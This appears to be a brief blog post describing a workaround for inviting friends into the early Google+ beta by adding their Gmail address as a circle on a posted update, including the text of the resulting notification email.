Today Mr. Usman Ahmed and Mr. Ali Raza Khuwaja, friends of mine who are penetration testers working with me, found a workaround for inviting people that works every time. The fun thing is that it has had a 100% success rate so far.

The bug basically takes advantage of the Circles feature. If you send the invite directly there is a problem, but if you go to your home page and in the update section write any update, just beneath it there is an option for adding a circle (group) to whom the update will be visible. Enter the email address of the Gmail user as a circle and post it.

After a while your friend receives a mail saying:

<< Update on Google+ >>
[Hyper link to Google+] ==>  View or comment on <<Your Name>> post »
The Google+ project is currently working out all the kinks with a small group of testers. If you’re not able to access Google+, please check again soon.

Just click on the hyperlink and you're in.

Peace !!!